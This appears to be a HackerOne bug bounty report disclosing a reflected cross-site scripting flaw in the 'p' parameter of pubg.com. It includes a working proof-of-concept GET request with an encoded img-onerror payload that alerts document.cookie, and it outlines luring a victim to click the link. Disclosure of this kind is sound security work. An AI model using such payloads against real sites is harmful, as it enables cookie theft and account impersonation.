Lucene search

K
hackerone0xfabiofH1:751870
HistoryDec 05, 2019 - 10:08 a.m.

PUBG: Reflected XSS in pubg.com

2019-12-0510:08:37
0xfabiof
hackerone.com
61

Summary:

PUBG’s main website https://www.pubg.com has an endpoint that is vulnerable to an injection vulnerability - namely a reflected injection of JavaScript, also known as Reflected Cross Site Scripting (XSS). As per OWASP’s definition: "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. "
This happens because one of the GET parameters “p” does not properly sanitize/escape user input, allowing an injection to occur.

Steps To Reproduce:

To reproduce this, an attacker has to:

  • Prepare a Javascript payload that it wants the victim to execute. In this case, for Proof of Concept purposes, our Javascript code will prompt an alert showing the users’ cookies.
alert(document.cookie);
  • Inject this Javascript code properly into the vulnerable parameter, creating thus a crafted future GET request that will inject the payload.
GET /?p=iqz78'%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3d1%3echplq HTTP/1.1
Host: www.pubg.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://www.pubg.com/es/feed/
Cookie: _icl_current_language=en; _icl_visitor_lang_js=en-us; wpml_browser_redirect_test=0; __cfduid=de74423d435717d651b1c9e2c63f4acc21575460678

Request PoC {F651167}

  • As this injection happens in a GET parameter, the attacker simply needs to send the crafted Link that produces this GET request to the victim and have the victim click it.

Injection Demonstration {F651168}

Supporting Material/References:

  • Video Demonstration

{F651177}

Impact

With user interaction, an attacker could execute arbitrary Javascript code in a victim’s browser.
This would allow an attacker to unwillingly make a victim:

  • Perform any action in the identified endpoint
  • View any information that the user is able to view
  • Modify any information that the user is able to modify (not sure if applicable in this case)
  • Interact with other application users as if it were him - impersonation (not sure if applicable in this case)